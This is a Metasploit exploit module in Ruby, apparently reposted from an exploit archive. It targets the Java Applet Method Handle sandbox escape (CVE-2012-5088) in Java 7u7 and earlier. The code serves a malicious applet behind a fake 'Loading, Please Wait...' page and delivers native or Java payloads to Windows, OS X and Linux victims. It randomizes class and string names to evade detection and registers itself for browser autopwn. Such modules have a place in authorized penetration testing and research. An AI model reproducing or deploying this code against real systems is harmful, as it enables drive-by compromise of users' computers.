Java Applet Method Handle Remote Code Execution

1. ##
2. # This file is part of the Exploit + Zero Day and may be subject to
3. # redistribution and commercial restrictions. Please see the Metasploit
4. # web site for more information on licensing and terms of use.
5. # http://metasploit.com/
6. ##
7.  
8. require 'msf/core'
9. require 'rex'
10.  
11. class Metasploit3 < Msf::Exploit::Remote
12. Rank = ExcellentRanking
13.  
14. include Msf::Exploit::Remote::HttpServer::HTML
15. include Msf::Exploit::EXE
16.  
17. include Msf::Exploit::Remote::BrowserAutopwn
18. autopwn_info({ :javascript => false })
19.  
20. def initialize( info = {} )
21.  
22. super( update_info( info,
23. 'Name' => 'Java Applet Method Handle Remote Code Execution',
24. 'Description' => %q{
25. This module abuses the Method Handle class from a Java Applet to run arbitrary
26. Java code outside of the sandbox. The vulnerability affects Java version 7u7 and
27. earlier.
28. },
29. 'License' => MSF_LICENSE,
30. 'Author' =>
31. [
32. 'Unknown', # Vulnerability discovery at security-explorations.com
33. 'juan vazquez' # Metasploit module
34. ],
35. 'References' =>
36. [
37. [ 'CVE', '2012-5088' ],
38. [ 'URL', '86352' ],
39. [ 'BID', '56057' ],
40. [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ],
41. [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]
42. ],
43. 'Platform' => [ 'java', 'win', 'osx', 'linux' ],
44. 'Payload' => { 'Space' => 20480, 'DisableNops' => true },
45. 'Targets' =>
46. [
47. [ 'Generic (Java Payload)',
48. {
49. 'Platform' => ['java'],
50. 'Arch' => ARCH_JAVA,
51. }
52. ],
53. [ 'Windows x86 (Native Payload)',
54. {
55. 'Platform' => 'win',
56. 'Arch' => ARCH_X86,
57. }
58. ],
59. [ 'Mac OS X x86 (Native Payload)',
60. {
61. 'Platform' => 'osx',
62. 'Arch' => ARCH_X86,
63. }
64. ],
65. [ 'Linux x86 (Native Payload)',
66. {
67. 'Platform' => 'linux',
68. 'Arch' => ARCH_X86,
69. }
70. ],
71. ],
72. 'DefaultTarget' => 0,
73. 'DisclosureDate' => 'Oct 16 2012'
74. ))
75. end
76.  
77.  
78. def setup
79. path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5088", "Exploit.class")
80. @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
81. path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5088", "B.class")
82. @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
83.  
84. @exploit_class_name = rand_text_alpha("Exploit".length)
85. @exploit_class.gsub!("Exploit", @exploit_class_name)
86. super
87. end
88.  
89. def on_request_uri(cli, request)
90. print_status("handling request for #{request.uri}")
91.  
92. case request.uri
93. when /\.jar$/i
94. jar = payload.encoded_jar
95. jar.add_file("#{@exploit_class_name}.class", @exploit_class)
96. jar.add_file("B.class", @loader_class)
97. metasploit_str = rand_text_alpha("metasploit".length)
98. payload_str = rand_text_alpha("payload".length)
99. jar.entries.each { |entry|
100. entry.name.gsub!("metasploit", metasploit_str)
101. entry.name.gsub!("Payload", payload_str)
102. entry.data = entry.data.gsub("metasploit", metasploit_str)
103. entry.data = entry.data.gsub("Payload", payload_str)
104. }
105. jar.build_manifest
106.  
107. send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
108. when /\/$/
109. payload = regenerate_payload(cli)
110. if not payload
111. print_error("Failed to generate the payload.")
112. send_not_found(cli)
113. return
114. end
115. send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
116. else
117. send_redirect(cli, get_resource() + '/', '')
118. end
119.  
120. end
121.  
122. def generate_html
123. html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
124. html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
125. html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
126. html += %Q|</applet></body></html>|
127. return html
128. end
129.  
130. end